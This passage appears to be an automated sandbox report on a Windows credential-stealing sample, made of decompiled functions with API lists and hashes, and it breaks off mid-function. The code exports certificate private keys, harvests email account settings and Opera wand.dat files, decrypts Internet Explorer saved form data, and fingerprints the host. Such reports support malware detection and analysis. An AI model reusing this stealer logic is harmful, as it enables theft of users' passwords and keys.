                                                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                        • API String ID: 1332880857-2111798378
                                                                        • Opcode ID: 1cfb6f29303b6518b73f7a5735e7eb61c5c9ca7466050d8cfc7a5a135c5cad1b
                                                                        • Instruction ID: 8f7519f456700ac6ee7d3b9319165bdb56a4dd37101f5fed1b12cdcb20d8ff00
                                                                        • Opcode Fuzzy Hash: 1cfb6f29303b6518b73f7a5735e7eb61c5c9ca7466050d8cfc7a5a135c5cad1b
                                                                        • Instruction Fuzzy Hash: 6171A33194011DBBDF226F51CC42BDDBAB6BF04704F1484FAB548750B5DB7A8AA1AF88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E0040D423(intOrPtr __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				CHAR** _v16;
                                                                        				CHAR* _v20;
                                                                        				long* _v24;
                                                                        				char _v28;
                                                                        				long* _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _t48;
                                                                        				int _t50;
                                                                        				int _t54;
                                                                        				CHAR** _t59;
                                                                        				CHAR** _t62;
                                                                        				CHAR** _t66;
                                                                        				CHAR** _t71;
                                                                        				intOrPtr _t79;
                                                                        				CHAR** _t81;
                                                                        				void* _t82;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x48, 0);
                                                                        				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
                                                                        					_t48 =  *0x414431(0, 0x416057); // executed
                                                                        					_v12 = _t48;
                                                                        					if(_v12 != 0) {
                                                                        						_t82 = 0;
                                                                        						while(1) {
                                                                        							_t82 =  *0x414435(_v12, _t82);
                                                                        							_t94 = _t82;
                                                                        							if(_t82 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t79 =  *((intOrPtr*)(_t82 + 0xc));
                                                                        							_v16 =  *((intOrPtr*)(_t79 + 0x68));
                                                                        							_t81 =  *(_t79 + 0x6c);
                                                                        							__eflags = _t81;
                                                                        							if(__eflags != 0) {
                                                                        								while(1) {
                                                                        									__eflags = _v16;
                                                                        									if(__eflags == 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									_t50 = lstrcmpA( *_t81, "2.5.29.37");
                                                                        									__eflags = _t50;
                                                                        									if(_t50 == 0) {
                                                                        										__eflags = _t81[2];
                                                                        										if(_t81[2] != 0) {
                                                                        											_v20 = E004017EC(_t81[2]);
                                                                        											E00401823(_t81[3], _v20, _t81[2]);
                                                                        											_t54 = lstrcmpA(_v20, 0x416064);
                                                                        											__eflags = _t54;
                                                                        											if(_t54 == 0) {
                                                                        												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
                                                                        												__eflags = _t59;
                                                                        												if(_t59 != 0) {
                                                                        													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
                                                                        													__eflags = _t62;
                                                                        													if(_t62 != 0) {
                                                                        														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
                                                                        														__eflags = _t66;
                                                                        														if(_t66 != 0) {
                                                                        															_v40 = E004017EC(_v36);
                                                                        															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
                                                                        															__eflags = _t71;
                                                                        															if(_t71 != 0) {
                                                                        																E00401486(_a4, 0xbeef0000);
                                                                        																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
                                                                        																E004014BC(_a4, _v40, _v36);
                                                                        															}
                                                                        															E004017D5(_v40);
                                                                        														}
                                                                        														CryptDestroyKey(_v32);
                                                                        													}
                                                                        													CryptReleaseContext(_v24, 0);
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v20);
                                                                        										}
                                                                        									}
                                                                        									_t81 =  &(_t81[4]);
                                                                        									_t40 =  &_v16;
                                                                        									 *_t40 = _v16 - 1;
                                                                        									__eflags =  *_t40;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        						}
                                                                        						 *0x414439(_v12, 0);
                                                                        					}
                                                                        				}
                                                                        				return E00401553(_t79, _t94, _a4, _v8);
                                                                        			}























                                                                        APIs
                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
                                                                        • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D4C2
                                                                        • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B
                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D547
                                                                        • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D55F
                                                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D578
                                                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D59D
                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 0040D5DB
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D5E6
                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D60E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                                                                        • String ID: 2.5.29.37
                                                                        • API String ID: 2649496969-3842544949
                                                                        • Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
                                                                        • Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00404C68(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t34;
                                                                        				CHAR* _t38;
                                                                        				void* _t42;
                                                                        				char* _t61;
                                                                        				char* _t62;
                                                                        				void* _t66;
                                                                        				signed int* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				_t66 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t34 = _a8;
                                                                        				if(_t34 == 0 ||  *_t34 == 0) {
                                                                        					L22:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					if(E004024D7(_a8) != 0) {
                                                                        						_t38 = E00401D15(_a8, "*.*");
                                                                        					} else {
                                                                        						_t38 = E00401D15(_a8, "\\*.*");
                                                                        					}
                                                                        					_v332 = _t38;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t42 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t42;
                                                                        					if(_t42 + 1 != 0) {
                                                                        						do {
                                                                        							_t67 =  &_v324;
                                                                        							if(( *_t67 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t67[0xb]);
                                                                        								if(StrStrIA(_v336, ".ini") != 0) {
                                                                        									_t61 = E00401D69(E00401D15(_a8, "\\"), _v336);
                                                                        									_push(_t61);
                                                                        									_push(_t61);
                                                                        									if(_a12 == 0) {
                                                                        										_t62 = 1;
                                                                        									} else {
                                                                        										_t62 = StrStrIA(_t61, "Sites\\");
                                                                        									}
                                                                        									_pop(_t68);
                                                                        									if(_t62 != 0) {
                                                                        										E00404C51(_a4, _t68);
                                                                        									}
                                                                        									E004017D5();
                                                                        								}
                                                                        							} else {
                                                                        								if(lstrcmpiA(0x414806,  &(_t67[0xb])) != 0) {
                                                                        									if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        										E00404C68(_t66, _a4, E00401D69(E00401D15(_a8, "\\"),  &( &_v324->cFileName)), _a12);
                                                                        										E004017D5(_t56);
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} while (FindNextFileA(_v328,  &_v324) != 0);
                                                                        						FindClose(_v328);
                                                                        					}
                                                                        					goto L22;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404CD8
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D01
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404D1E
                                                                        • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DCD
                                                                        • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404DE0
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$.ini$Sites\$\*.*
                                                                        • API String ID: 3040542784-999409347
                                                                        • Opcode ID: e1bb2ffe983e4b038be18f0bf9c9b0548de30d9aec84dee69d50f4d1609f173b
                                                                        • Instruction ID: 5db4acfa8798974ae1da366c45271d1f2871770cf77317101492fac7cf3c5390
                                                                        • Opcode Fuzzy Hash: e1bb2ffe983e4b038be18f0bf9c9b0548de30d9aec84dee69d50f4d1609f173b
                                                                        • Instruction Fuzzy Hash: E33163B1510109AADF21BF62DC02FEE7679AF84308F1441BBB608B50F1D77C9ED09A59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E004043DD(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				struct _OSVERSIONINFOA _v164;
                                                                        				char* _v168;
                                                                        				char _v172;
                                                                        				intOrPtr _v176;
                                                                        				struct _SYSTEM_INFO _v212;
                                                                        				struct HINSTANCE__* _v216;
                                                                        				int _t51;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr* _t75;
                                                                        				void* _t82;
                                                                        				struct _SYSTEM_INFO* _t85;
                                                                        				char* _t87;
                                                                        
                                                                        				_v8 = E0040150D(_a4, 0, 0);
                                                                        				E00401486(_a4, 0xbeef0001);
                                                                        				E00401803( &_v164, 0x9c);
                                                                        				_v164.dwOSVersionInfoSize = 0x9c;
                                                                        				_t51 = GetVersionExA( &_v164);
                                                                        				_t85 = 0;
                                                                        				_t86 = 0;
                                                                        				_t87 =  &(_v164.szCSDVersion);
                                                                        				while(_t85 < 0x80) {
                                                                        					__eflags =  *_t87;
                                                                        					if( *_t87 == 0) {
                                                                        						_t86 = 1;
                                                                        					}
                                                                        					_t86 = _t86;
                                                                        					__eflags = _t86;
                                                                        					if(_t86 != 0) {
                                                                        						 *_t87 = 0;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					_t85 =  &(_t85->dwOemId.dwOemId);
                                                                        					__eflags = _t85;
                                                                        				}
                                                                        				if(_t51 == 0) {
                                                                        					E004014BC(_a4, 0, 0);
                                                                        				} else {
                                                                        					E004014BC(_a4,  &_v164, 0x9c);
                                                                        				}
                                                                        				E00401486(_a4, E0040424A());
                                                                        				_v168 = E004017EC(0x400);
                                                                        				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
                                                                        				E004014BC(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff));
                                                                        				E00401486(_a4, E004042B2()); // executed
                                                                        				E0040434C(_t85, _t86); // executed
                                                                        				_t65 = E00402725(_t85, _t86, "HWID",  &_v172); // executed
                                                                        				_v176 = _t65;
                                                                        				if(_v176 == 0 || _v172 < 0x14) {
                                                                        					E004014BC(_a4, 0, 0);
                                                                        				} else {
                                                                        					_v172 = _v172 + 4;
                                                                        					E00401486(_a4, _v172);
                                                                        					_v172 = _v172 - 4;
                                                                        					E00401486(_a4, 0xffffffff);
                                                                        					E0040149B(_a4, _v176, _v172);
                                                                        				}
                                                                        				E004017D5(_v176);
                                                                        				E004017D5(_v168);
                                                                        				_t82 = 0;
                                                                        				_v216 = GetModuleHandleA("kernel32.dll");
                                                                        				if(_v216 != 0) {
                                                                        					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
                                                                        					if(_t75 != 0) {
                                                                        						_t86 =  &_v212;
                                                                        						 *_t75( &_v212); // executed
                                                                        						_t82 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t96 = _t82;
                                                                        				if(_t82 == 0) {
                                                                        					GetSystemInfo( &_v212);
                                                                        				}
                                                                        				E004014BC(_a4,  &_v212, 0x24);
                                                                        				return E00401553(_t86, _t96, _a4, _v8);
                                                                        			}

















                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 00404426
                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000,00000000,0000009C), ref: 004044AB
                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,?,?,00000000,00000400,00001002,?,000003FF,00000400,?,00000000,?,00000000), ref: 004044D4
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001,?), ref: 00404589
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004045A8
                                                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000), ref: 004045B8
                                                                        • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,?,00000000,00000000,HWID,?,?,00000000,?,?,00000000,00000400,00001001), ref: 004045C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                                        • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                                        • API String ID: 1787888500-92997708
                                                                        • Opcode ID: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
                                                                        • Instruction ID: a5c158b064667e592a77a643291b10812bd144366de3c56d291d59684d6421bf
                                                                        • Opcode Fuzzy Hash: 74b982c3051711e6a4f82ec7bc2e3ba0a2c708dbed47e03aa435c593a8e72e59
                                                                        • Instruction Fuzzy Hash: 07515E71A00218BEDF217BA1CC46F9D7A75AF81308F0080BAB748750F1DBB95AD09F5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040890D(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char** _v336;
                                                                        				char* _v340;
                                                                        				char* _t30;
                                                                        				void* _t36;
                                                                        				int _t39;
                                                                        				char* _t48;
                                                                        				void* _t54;
                                                                        
                                                                        				_t54 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t30 = _a8;
                                                                        				if(_t30 == 0 ||  *_t30 == 0) {
                                                                        					L14:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					_v332 = E00401D15(_a8, "\*.*");
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t36 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t36;
                                                                        					if(_t36 + 1 == 0) {
                                                                        						goto L14;
                                                                        					} else {
                                                                        						goto L4;
                                                                        					}
                                                                        					do {
                                                                        						L4:
                                                                        						if((_v324.dwFileAttributes & 0x00000010) != 0) {
                                                                        							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
                                                                        								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        									_v336 =  &( &_v324->cFileName);
                                                                        									_t48 = E00401D69(E00401D15(_a8, "\\"), _v336);
                                                                        									_v340 = _t48;
                                                                        									_push(_t48);
                                                                        									if(StrStrIA(_v340, "opera") != 0) {
                                                                        										E00408789(_t54, _a4, _v340, "wand.dat");
                                                                        									}
                                                                        									E004017D5();
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t39 = FindNextFileA(_v328,  &_v324); // executed
                                                                        					} while (_t39 != 0);
                                                                        					FindClose(_v328); // executed
                                                                        					goto L14;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*), ref: 00408962
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 00408995
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 004089AF
                                                                        • StrStrIA.SHLWAPI(?,opera,00000000,00000000,?,?,004140DA,00414808,?,00414806,?,00000000,?,?,0000013E,?), ref: 004089F4
                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A22
                                                                        • FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A35
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*$opera$wand.dat
                                                                        • API String ID: 3663067366-3278183560
                                                                        • Opcode ID: 82e690228408d0f1213fd84889cbb2bc0fe423fcdafe6c43ad429ef1058aca61
                                                                        • Instruction ID: c71bf560eb1c7fb0c09b774ce167880e188dc30df44f9e3f007173dba5e297e0
                                                                        • Opcode Fuzzy Hash: 82e690228408d0f1213fd84889cbb2bc0fe423fcdafe6c43ad429ef1058aca61
                                                                        • Instruction Fuzzy Hash: BF312C7190011DAADF61AB61CD42BED7775AF44308F1440ABB54CB61B1DA789EC08F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00403F86(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t44;
                                                                        				CHAR* _t48;
                                                                        				void* _t52;
                                                                        				int _t58;
                                                                        				void* _t67;
                                                                        				void* _t73;
                                                                        				void* _t77;
                                                                        				signed int* _t78;
                                                                        
                                                                        				_t77 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t44 = _a8;
                                                                        				if(_t44 == 0 ||  *_t44 == 0) {
                                                                        					L25:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					if(E004024D7(_a8) != 0) {
                                                                        						_t48 = E00401D15(_a8, "*.*");
                                                                        					} else {
                                                                        						_t48 = E00401D15(_a8, "\*.*");
                                                                        					}
                                                                        					_v332 = _t48;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t52 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t52;
                                                                        					if(_t52 + 1 != 0) {
                                                                        						do {
                                                                        							_t78 =  &_v324;
                                                                        							if(( *_t78 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t78[0xb]);
                                                                        								if(_a12 != 0) {
                                                                        									if(StrStrIA(_v336, _a12) == 0) {
                                                                        										goto L23;
                                                                        									}
                                                                        									L19:
                                                                        									_t73 = E00401D69(E00401D15(_a8, "\\"), _v336);
                                                                        									_push(_t73);
                                                                        									if(_a20 == 0) {
                                                                        										E00403E4C(_a4, _t73, _a16);
                                                                        									} else {
                                                                        										_a20(_a4, _t73, _a16);
                                                                        									}
                                                                        									E004017D5();
                                                                        									goto L23;
                                                                        								}
                                                                        								goto L19;
                                                                        							}
                                                                        							if(lstrcmpiA(0x414806,  &(_t78[0xb])) != 0) {
                                                                        								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        									if(E004024D7(_a8) != 0) {
                                                                        										_t67 = E00401D15(_a8, 0);
                                                                        									} else {
                                                                        										_t67 = E00401D15(_a8, "\\");
                                                                        									}
                                                                        									E00403F86(_t77, _a4, E00401D69(_t67,  &( &_v324->cFileName)), _a12, _a16, _a20); // executed
                                                                        									E004017D5(_t68);
                                                                        								}
                                                                        							}
                                                                        							L23:
                                                                        							_t58 = FindNextFileA(_v328,  &_v324); // executed
                                                                        						} while (_t58 != 0);
                                                                        						FindClose(_v328); // executed
                                                                        					}
                                                                        					goto L25;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00403FF6
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404023
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404040
                                                                        • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040410A
                                                                        • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040411D
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 3040542784-1692270452
                                                                        • Opcode ID: e3bc355903d9d5b5cb0f98c3cee977bacf398a76d9c90776279f857e1b13ffde
                                                                        • Instruction ID: 0e5482085a8478f848b24922490d45c82c48751e20b01fa21e1f70377cfbccc4
                                                                        • Opcode Fuzzy Hash: e3bc355903d9d5b5cb0f98c3cee977bacf398a76d9c90776279f857e1b13ffde
                                                                        • Instruction Fuzzy Hash: 90413DB150010DAADF21AF61DC02BEE7B79AF84308F1080B7B609B54B1D77D9EA09B59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
                                                                        				char _v24;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v52;
                                                                        				char _v56;
                                                                        				intOrPtr _v60;
                                                                        				void* _v64;
                                                                        				char _v68;
                                                                        				void* _v72;
                                                                        				char _v76;
                                                                        				void* _v80;
                                                                        				char _v84;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				void* _t80;
                                                                        				signed int _t81;
                                                                        				void* _t84;
                                                                        				void* _t85;
                                                                        
                                                                        				_t80 = __ecx;
                                                                        				_t50 = lstrlenW(_a8);
                                                                        				if(_t50 != 0) {
                                                                        					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
                                                                        					_t81 = 0;
                                                                        					_v48 = 0;
                                                                        					while(_t81 < 0x14) {
                                                                        						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
                                                                        						_t81 = _t81 + 1;
                                                                        					}
                                                                        					_t84 = 0;
                                                                        					_v52 = 0;
                                                                        					while(_t84 < 0x14) {
                                                                        						_push( *(_t84 +  &_v24) & 0x000000ff);
                                                                        						wsprintfA( &_v44, "%02X");
                                                                        						_t85 = _t85 + 0xc;
                                                                        						_v52 = E00401D69(_v52,  &_v44);
                                                                        						_t84 = _t84 + 1;
                                                                        					}
                                                                        					_v48 = _v48 & 0x000000ff;
                                                                        					_push(_v48);
                                                                        					wsprintfA( &_v44, "%02X");
                                                                        					_v52 = E00401D69(_v52,  &_v44);
                                                                        					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
                                                                        					_t67 = _t66;
                                                                        					if(_t67 != 0) {
                                                                        						_v60 = _t67;
                                                                        						if(_v56 != 0) {
                                                                        							_v84 = (lstrlenW(_a8) << 1) + 2;
                                                                        							_push(_a8);
                                                                        							_pop( *_t30);
                                                                        							_push(_v56);
                                                                        							_pop( *_t32);
                                                                        							_push(_v60);
                                                                        							_pop( *_t34);
                                                                        							_v72 = 0;
                                                                        							if( *0x41442d != 0) {
                                                                        								_push( &_v76);
                                                                        								_push(1);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_push( &_v84);
                                                                        								_push(0);
                                                                        								_push( &_v68);
                                                                        								if( *0x41442d() != 0 && _v72 != 0) {
                                                                        									if(_a12 != 0) {
                                                                        										 *_a12 = 0x3f;
                                                                        									}
                                                                        									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
                                                                        									LocalFree(_v72);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v60);
                                                                        					}
                                                                        					return E004017D5(_v52);
                                                                        				} else {
                                                                        					return _t50;
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 0040A36E
                                                                        • wsprintfA.USER32 ref: 0040A3EB
                                                                        • lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A474
                                                                        • LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                                        • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                        • API String ID: 1926481713-2450551051
                                                                        • Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
                                                                        • Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404FD8(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char** _v336;
                                                                        				char* _t31;
                                                                        				void* _t40;
                                                                        
                                                                        				_v332 = 0;
